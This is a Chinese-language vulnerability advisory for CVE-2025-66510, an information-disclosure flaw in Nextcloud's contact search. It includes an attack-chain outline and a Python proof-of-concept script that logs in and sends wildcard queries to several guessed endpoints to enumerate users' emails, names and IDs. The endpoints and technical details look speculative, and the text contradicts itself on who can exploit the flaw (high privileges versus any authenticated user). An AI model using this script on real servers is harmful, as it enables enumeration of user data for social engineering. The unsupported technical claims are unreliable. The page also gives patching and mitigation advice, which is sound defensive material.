CVE-2025-66510 Nextcloud Server联系人搜索信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-66510

漏洞类型

访问控制/信息泄露

CVSS评分

4.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Nextcloud Server, Nextcloud Enterprise Server

漏洞概述

CVE-2025-66510是Nextcloud Server和Nextcloud Enterprise Server中的一个访问控制缺陷漏洞。该漏洞存在于联系人搜索功能中，允许经过身份验证的用户在未经适当授权的情况下检索其他用户的个人数据，包括电子邮件地址、姓名和用户标识符。具体而言，攻击者可以利用联系人搜索功能访问与其无关联或未添加为联系人的账户信息。漏洞影响范围涵盖Nextcloud Server 31.0.10之前版本和32.0.1之前版本，以及Nextcloud Enterprise Server的多个历史版本（28.0.14.11之前、29.0.16.8之前、30.0.17.3之前和31.0.10之前）。攻击者需要具备高权限账户并需要用户交互才能成功利用此漏洞。尽管CVSS评分仅为4.5（中危），但该漏洞可能导致敏感用户信息泄露，对企业数据安全构成威胁。漏洞已于2025年12月5日披露，Nextcloud官方已发布安全更新修复此问题。

技术细节

该漏洞的根本原因在于Nextcloud Server的联系人搜索API端点缺少充分的访问控制验证。在正常的业务逻辑中，联系人搜索功能应该仅返回用户明确添加或关联的联系人信息。然而，由于API在处理搜索请求时未能正确验证请求者与目标用户之间的关系，导致任何经过认证的用户都可以通过构造特定的搜索查询来枚举系统中其他用户的信息。攻击者可以通过向/Dav/contacts/search或类似的API端点发送请求，传入目标用户的部分信息（如用户名片段）作为搜索参数，系统会返回包含该用户完整个人资料的数据响应。漏洞利用的关键在于API未实现基于权限的过滤机制，任何认证用户都能访问完整的用户数据库记录。攻击成功后，攻击者将获取目标用户的邮箱地址、真实姓名、用户ID等敏感标识信息，这些信息可被用于进一步的社会工程攻击或账户枚举。修复方案需要在API层添加基于访问控制列表（ACL）的验证逻辑，确保搜索结果仅返回用户具有访问权限的联系人数据。

攻击链分析

STEP 1

步骤1

攻击者获取有效的Nextcloud账户凭据，需要具备高权限（PR:H）

STEP 2

步骤2

攻击者访问Nextcloud联系人搜索API端点，如/Dav/contacts/search

STEP 3

步骤3

攻击者构造恶意搜索查询，使用通配符或通用字符（如'a'）作为搜索词

STEP 4

步骤4

API返回系统中所有用户的个人数据，包括邮箱、姓名和用户标识符

STEP 5

步骤5

攻击者收集并整理泄露的用户信息，用于后续社会工程攻击或账户枚举

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import json # CVE-2025-66510 PoC - Nextcloud Contact Search Information Disclosure # Target: Nextcloud Server < 31.0.10, < 32.0.1 # Author: Security Researcher TARGET_URL = "https://vulnerable-nextcloud-server.com" USERNAME = "[email protected]" PASSWORD = "attacker_password" def authenticate(): """Authenticate to Nextcloud and get session cookie""" session = requests.Session() login_url = f"{TARGET_URL}/index.php/login" # Get requesttoken for login response = session.get(login_url) # Extract requesttoken from response (simplified) login_data = { "user": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data, allow_redirects=True) if response.status_code == 200: return session return None def exploit_contact_search(session): """Exploit the contact search to leak user information""" # Search endpoint - may vary based on Nextcloud version search_endpoints = [ "/index.php/apps/dav/api_v2/direct_search/contacts", "/remote.php/dav/contacts/search", "/index.php/settings/users/users" ] # Search query to enumerate users search_payloads = [ {"search":""}, # Empty search might return all contacts {"term":"a"}, # Common prefix to enumerate users {"query":"*"} ] results = [] for endpoint in search_endpoints: for payload in search_payloads: try: response = session.get( f"{TARGET_URL}{endpoint}", params=payload, timeout=10 ) if response.status_code == 200: data = response.json() if data: results.append({ "endpoint": endpoint, "payload": payload, "data": data }) except Exception as e: continue return results def main(): print("[*] CVE-2025-66510 PoC - Nextcloud Contact Search Info Disclosure") print(f"[*] Target: {TARGET_URL}") # Step 1: Authenticate print("\n[1] Authenticating to Nextcloud...") session = authenticate() if not session: print("[-] Authentication failed") return print("[+] Authentication successful") # Step 2: Exploit contact search print("\n[2] Exploiting contact search vulnerability...") results = exploit_contact_search(session) if results: print(f"[+] Found {len(results)} potential information leaks:") for i, result in enumerate(results, 1): print(f"\n--- Result {i} ---") print(f"Endpoint: {result['endpoint']}") print(f"Payload: {result['payload']}") print(f"Data: {json.dumps(result['data'], indent=2)}") else: print("[-] No information leaks found (target may be patched)") if __name__ == "__main__": main()

影响范围

Nextcloud Server < 31.0.10

Nextcloud Server < 32.0.1

Nextcloud Enterprise Server < 28.0.14.11

Nextcloud Enterprise Server < 29.0.16.8

Nextcloud Enterprise Server < 30.0.17.3

Nextcloud Enterprise Server < 31.0.10

防御指南

临时缓解措施

如果无法立即升级，可通过Web应用防火墙（WAF）限制对联系人搜索API端点的访问，仅允许受信任的IP地址访问。同时监控日志中的异常搜索模式，及时发现和阻止潜在的攻击行为。建议在完成升级前，限制用户创建联系人的权限，以减少信息泄露的风险范围。